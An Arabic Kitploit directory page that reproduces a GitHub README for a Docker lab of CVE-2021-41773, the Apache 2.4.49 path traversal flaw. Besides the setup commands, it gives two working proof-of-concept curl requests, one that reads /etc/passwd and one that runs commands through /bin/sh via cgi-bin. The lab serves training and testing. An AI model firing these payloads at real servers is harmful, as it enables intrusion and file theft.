Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-41773S — # مختبر ضعيف قائم على Docker لثغرة CVE-2021-41773 في Apache لتجاوز المسار، مع توفير إعدادات PoC لقراءة الملفات وتنفيذ الأكواد عن بُعد في بيئة محكومة. | Kitploit
أدوات/GitHubGitHub/mightysai1997/cve-2021-41773s
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubmightysai1997/cve-2021-41773s

CVE-2021-41773S

# مختبر ضعيف قائم على Docker لثغرة CVE-2021-41773 في Apache لتجاوز المسار، مع توفير إعدادات PoC لقراءة الملفات وتنفيذ الأكواد عن بُعد في بيئة محكومة.

عرض المستودع
12منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

صور Docker القابلة للاختراق لثغرة CVE-2021-41773 لتجاوز المسار في Apache

تنطبق هذه الثغرة فقط على الإصدار 2.4.49 الذي يحتوي على إعدادات غير افتراضية محددة. في حالات معينة، يمكن أن يؤدي ذلك إلى قراءة ملفات أو تنفيذ كود.

tweet https://twitter.com/ptswarm/status/1445376079548624899

إعداد قراءة الملفات القابل للاختراق

يمكن سحب الحاويات مباشرة من Docker Hub باستخدام

docker pull blueteamsteve/cve-2021-41773:no-cgid

وتشغيلها باستخدام

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

يمكن عرض سجلات Apache باستخدام الأمر أدناه، أو فقط استبعاد "-dit" من أمر التشغيل أعلاه لبث stdio docker logs <container-id>

إثبات المفهوم لقراءة الملفات

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

إعداد تنفيذ الأكواد عن بُعد (RCE) القابل للاختراق

يمكن سحب الحاويات مباشرة من Docker Hub باستخدام

docker pull blueteamsteve/cve-2021-41773:with-cgid

وتشغيلها باستخدام

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

يمكن عرض سجلات Apache باستخدام الأمر أدناه، أو فقط استبعاد "-dit" من أمر التشغيل أعلاه لبث stdio docker logs <container-id>

إثبات المفهوم لتنفيذ الأكواد (RCE)

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

إنشاء حاويات Docker مخصصة

قم بتعديل وبناء إصداراتك الخاصة باستخدام ملفات dockerfile وملفات httpd.conf النموذجية في الدلائل الفرعية

  • استخدم ./no-cgi للإعداد القابل للاختراق لقراءة الملفات
  • استخدم ./with-cgi للإعداد القابل للاختراق لتنفيذ الأكواد
تنزيل الأداة